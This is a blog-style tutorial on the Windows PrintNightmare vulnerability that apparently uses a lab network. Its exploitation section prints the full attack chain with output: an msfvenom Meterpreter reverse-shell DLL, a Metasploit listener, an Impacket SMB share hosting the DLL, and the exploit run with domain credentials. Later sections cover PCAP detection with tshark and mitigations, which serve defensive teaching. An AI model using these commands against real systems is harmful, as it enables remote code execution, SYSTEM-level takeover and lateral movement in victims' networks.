Open in app

Sign in

Write

Sign in

PRINTNIGHTMARE VULNERABILITY

Nathaneal Meththananda
10 min readMay 31, 2022

ABOUT THE WINDOWS PRINT SPOOLER

A printer spooler is an application which manages the paper printing jobs sent from a computer to a printer and also this service allows the system to act as print clients or print servers. It’s a definite to have a print spooler service on the computer to connect to a printer and main disadvantage of this service is that its enabled by default runs within the SYSTEM context so attackers could easily exploit this service to gain privileged access on the system.

This attack is mainly used in domain controllers for printer pruning. In a domain controller printers are objects and the pruning process by which printers that are published but which are no longer available on the network are removed from the AD to prevent users from trying to print to non-existent printers, basically the printer pruning eliminates the issue for the users reaching out to a non-existent printer.

Spooler Components

For this vulnerability there are 2 Types of CVE’s one is for LPE and the other is for RCE but recently the exploit which was for LPE was rename for a RCE exploit which is CVE-2021–1675.

  1. CVE-2021–1675 → This exploit successfully works on both the attack vectors LPE and RCE. At first Microsoft has classified this CVE as LPE but later on they have changed into RemoteCodeExecution. As for your knowledge the LPE exploit is named as “SharpPrintNightmare”
  2. CVE-2021–34527 → Using this exploit the attackers could remotely inject the malicious DLL file by hosting the DLL file on a SMB server.

An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data or create new accounts with full user rights.

HOW TO EXPLOIT THE VULNERABILITY REMOTELY

When an attacker tries to exploit the print spooler remotely To verify whether a host is vulnerable for the printnightmare flaw we could use a tool named “rpcdump.py

‘’’┌──(root㉿snowdox)-[/home/snowdox]
└─# rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
‘’’

EXPLOITATION

In order to exploit this vulnerability, the delivery method of this exploit is a malicious DLL. This method is also called as a ‘File-less’ exploitation which helps us to bypass most of the protections on the system, such as the antivirus software. In this attack I am gonna trick the print spooler service to install a new driver from an UNC path and load the driver but in our case it’s the malicious DLL and this would give us a reverse shell to our attacker machine. To create our malicious DLL I’ll be using ‘msfvenom’ and since our architecture is a windows 64 bit machine I’ll be embedding a Windows x64 payload to the DLL, providing the LocalHost and the LocalPort which we are gonna start a listener for a callback from the DLL. You can find your IP address of the machine by typing “ifconfig”On a later article I’ll explain you’ll on how to create a DLL using C++ which could be used to add a user to the Windows System and login using the provided credentials if ‘WinRM’ port is open, but for now let’s stick to msfvenom. Use the below command to create your malicious DLL.

┌──(root㉿snowdox)-[/home/snowdox]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.18.103.254 LPORT=9000 -f dll -o /home/snowdox/RedTeam/Print/Print_Mal.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 8704 bytes
Saved as: /home/snowdox/RedTeam/Print/Print_Mal.dll

As we have created our malicious DLL, next we have to start our Listener on the “Metasploit Framework” to get the ‘Meterpreter’ shell back when the DLL is executed on the system. To start the Listener follow the below steps. In the end type ‘exploit -j’ to start the listener in the background.

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 9000
LPORT => 9000
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.18.103.254:9000
msf6 exploit(multi/handler) >

Now we have started our listener, let’s start our SMB server to host our malicious DLL file. Go to the system path where you have saved your DLL and enter the below command to start the SMB server, but before that make sure you have installed ‘Impacket’ on the machine. Impacket is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. To start the ‘smbserver.py’ script to host our malicious DLL enter the command below within the file directory where you have stored the DLL.

┌──(root㉿snowdox)-[/home/snowdox/RedTeam/Print]
└─# smbserver.py share . -smb2support
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Cool, now we have already set up everything you could start the exploitation process using the

CVE-2021–1675 POC by providing the domain controller and user credentials with the UNC path for the hosted malicious DLL on our system.

┌──(root㉿snowdox)-[/home/snowdox/RedTeam/Print]
└─# python CVE-2021-1675.py NetworkAD-EDU.ENGdepartment.local/jjsmith:wellsaidsecurity143@10.10.220.93 '\\\\10.18.103.254\\share\\Print_Mal.dll'
[*] Connecting to ncacn_np:10.10.220.93[\\PIPE\\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL
[*] Executing \\??\\UNC\\10.18.103.254\\share\\Print_Mal.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...

After few seconds running the exploit script, if we go back to the listener we started in ‘Metasploit’ it shows that it has opened a ‘Meterpreter’ session so that now we could interact with victim machine using the ‘Meterpreter shell’.

use the command below to find the list of opened session in the ‘Metasploit Framework’

sessions -l

To interact with the created session use the command below, after entering the command you’ll be able to get into the Meterpreter shell.

sessions -i 1

‘1’ is the session number you find when you execute ‘sessions -l’ to get the list of opened sessions on the framework.

After executing the ‘shell’ command in the meterpreter shell you will be able to get windows command prompt so that you could interact with the System itself.

As the exploit said we were able to get “Administrator” Access on the system. After this you can pivot in to various machines and networks until you are “Domain Admin” on the Active Directory.

DETECTING THE NIGHTMARE EXPLOIT WITH FROM A TRAFFIC CAPTURE

What’s a PCAP file?

PCAP is an application programming interface (API) that captures and stores network data gathered by the network traffic capturing program which is ‘Wireshark’. These files are used to analyse networks, monitor bandwidth usage, detect Malware, Cyber Attacks and for troubleshooting the network.

Before analysing the PCAP file let’s get some metadata from the PCAP file to verify that we are indeed analysing a real PCAP file. For that I would first use “exiftool” and “file” utility to gather some metadata about the PCAP file which are very crucial for Security Analysts.

┌──(root㉿snowdox)-[/home/snowdox]
└─# file printnightmare.pcap 
printnightmare.pcap: pcap capture file, microsecond ts (little-endian) - version 2.4 (Ethernet, capture length 262144)

From the above results you could see that it is a PCAP file and shows us the capture length too.

┌──(root㉿snowdox)-[/home/snowdox]
└─# exiftool printnightmare.pcap 
ExifTool Version Number         : 12.41
File Name                       : printnightmare.pcap
Directory                       : .
File Size                       : 6.7 MiB
File Modification Date/Time     : 2022:05:23 15:59:14-04:00
File Access Date/Time           : 2022:05:23 16:26:20-04:00
File Inode Change Date/Time     : 2022:05:23 16:20:30-04:00
File Permissions                : -r--------
Error                           : Unknown file type

Using the ‘Exiftool’ we could the Modified and the Access date/time and permissions of this file.

Using TSHARK

TShark is the CLI version of the ‘WireShark’ tool and it’s a network protocol analyser.There are 2 modes in ‘tshark’, one is to capture the network traffic on a live network and the other is to read packets from a previously saved captured file.

First we need to see how many machines are involved in the traffic which was captured by the analyst. To find them use the command below:

tshark -r printnightmare.pcap -q -z endpoints,tcp

From the results we could see that there are many IP addresses in the traffic, which also means many machines were used in this attack, yet there is only 2 IP address connecting to the SMB server which is hosted on port 445 so better lookout for those IP’s in wireshark.

tshark -r printnightmare.pcap -q -z conv,tcp

Only 10.10.114,174 and 10.10.124.236 are in communication, between the ports 10.10.114.17:65200 and 10.10.124.236:57554 with 445 respectively. We know the latter 445 port is typically SMB, so we can perhaps make an assumption that 10.10.114.174 is the target machine with it’s SMB port exposed. This makes 10.10.124.236 the attacker machine.

Next let’s check which users have been compromised in the ‘Domain’. If we query the NTLM authentication. We can see that the ‘lowprivlarry’ is mentioned in the ‘printnightmare.local’ Domain.

┌──(root㉿snowdox)-[/home/snowdox]
└─# tshark -r printnightmare.pcap -Y ntlmssp.auth.username
Running as user "root" and group "root". This could be dangerous.
8119 142.344290 10.10.124.236 → 10.10.114.174 SMB2 700 Session Setup Request, NTLMSSP_AUTH, User: **WIN-1O0UJBNP9G7.printnightmare.local\\lowprivlarry**
8150 142.404151 10.10.114.174 → 10.10.124.236 SMB2 318 Session Setup Request, NTLMSSP_AUTH, User: \\, Unknown NTLMSSP message type

‘TShark’ gives us a quick way to just gather what protocols are involved full stop. No real details, just an overview. The -z flag is all about providing overviews, summaries, and statistics of the protocols, services, layers, and other things. Use the following command to list out the protocols used in this attack:

┌──(root㉿snowdox)-[/home/snowdox]
└─# tshark -r printnightmare.pcap -q -z io,phs                                                                                                                                                      
Running as user "root" and group "root". This could be dangerous.

===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:19353 bytes:6741197
  ip                                     frames:19317 bytes:6738999
    tcp                                  frames:19228 bytes:6720511
      tls                                frames:9824 bytes:4758373
        tcp.segments                     frames:94 bytes:218144
          tls                            frames:69 bytes:204520
      data                               frames:137 bytes:679768
      nbss                               frames:792 bytes:216383
        smb                              frames:2 bytes:254
        smb2                             frames:790 bytes:216129
          data                           frames:20 bytes:23520
      http                               frames:4 bytes:1432
        data-text-lines                  frames:1 bytes:291
        xml                              frames:1 bytes:579
    udp                                  frames:89 bytes:18488
      dns                                frames:36 bytes:4897
      quic                               frames:30 bytes:9708
        quic                             frames:2 bytes:2644
          quic                           frames:2 bytes:2644
      nbdgm                              frames:1 bytes:243
        smb                              frames:1 bytes:243
          mailslot                       frames:1 bytes:243
            browser                      frames:1 bytes:243
      ssdp                               frames:12 bytes:2592
      llmnr                              frames:6 bytes:608
      nbns                               frames:4 bytes:440
  arp                                    frames:30 bytes:1470
  ipv6                                   frames:6 bytes:728
    udp                                  frames:6 bytes:728
      llmnr                              frames:6 bytes:728
===================================================================

In order to find more information about this packet capture I though of using ‘WireShark’ tool. Since we know that to compromise a machine which has ‘PrintSpooler’ running the attacker uses a malicious a DLL file to get connection back. So i used the ‘search’ utility in the tool to find any DLL transfers on the network.

This is what I typed on the search bar to find the DLL file:

search --> '.dll'

Here I was able to find the DLL file which was used in this attack and in the below image I was able to find the SMB share which the attacker used to connect to grab the malicious DLL file.

MITIGATION

Method 1:

DISABLING PRINT SPOOLER SERVICE USING POWERSHELL

To protect your infrastructure against the PrintNightmare Vulnerability you need to first identify the service in your infrastructure in this case it’s you “Active Directory”. Using the following Powershell CMDlet identify the PrintSpooler Service.

PS C:\\Users\\Nathaneal> Get-Service -Name SpoolerStatus     Name            DisplayName
------    ------          -------------
Running   Spooler          Print Spooler

From the above result you can see that the System has a running “Print Spooler” Service. Next if your organisation is fine with disabling this Service we could use powershell to disable the Print Spooler service.

PS C:\\Users\\Nathaneal> Stop-Service -Name Spooler -Force

This command will disable the service currently in the system or the Active Direcotry which it’s connected to.

PS C:\\Users\\Nathaneal> Set-Service -Name Spooler -StartUpType disabled

This command will make sure that this service is not started on reboot of the system. After disabling the service completly you could use “rpcdump.py” tool to confirm that the system is not vulnerable for the PrintNightmare exploit

┌──(root㉿snowdox)-[/home/snowdox]
└─# rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'

After executing the above command the service is no longer shown and the both the exploits doesn’t work on the system(RCE and LPE).

Method 2:

DISABLING INBOUND REMOTE PRINTING THROUGH GROUP POLICY

In a Active Directory machines that need the ability to print locally or through a shared printer, where the ‘Print Spooler’ cannot be disabled you can instead disable inbound remote printing to shutdown the print server functionality within the Print Spooler Service and you could prevent the RCE exploit compromising the system, yet Local Privilege Escalation [LPE] are still applicable.

To configure the inbound policy goto the following location in the Windows machine.

Computer Configuration > Policies > Administrative Templates > Printers

and then open the “Allow Print Spooler to accept client connections” and choose “Disabled” to block all the remote attacks from an adversaries.

In order to protect and detect attacks in the internal infrastructure using EDR and Antivirus Solutions will be a good idea and to prevent any individual attacks on system we could change the value to ‘0’ for the follwing registry keys but keep in mind that these registry keys does not exist by default.

1. HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint
2. NoWarningNoElevationOnInstall = 0 (DWORD)
3. NoWarningNoElevationOnUpdate = 0 (DWORD)

Alright I hope that you’ll got an idea on how to exploit a domain user using the ‘PrintNightmare’ exploit. This is just a simple but a comprehensive guide on how to exploit and detect the attack but in the coming days I hope to write about the internal mechanism of this attack.

Cybersecurity
Printnightmare
Exploitation
Hackerrank
Windows

--

--

Nathaneal Meththananda

Written by Nathaneal Meththananda

15 Followers

19 years | Security Engineer | Malware Analyst | Penetration Tester | Sri Lankan

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams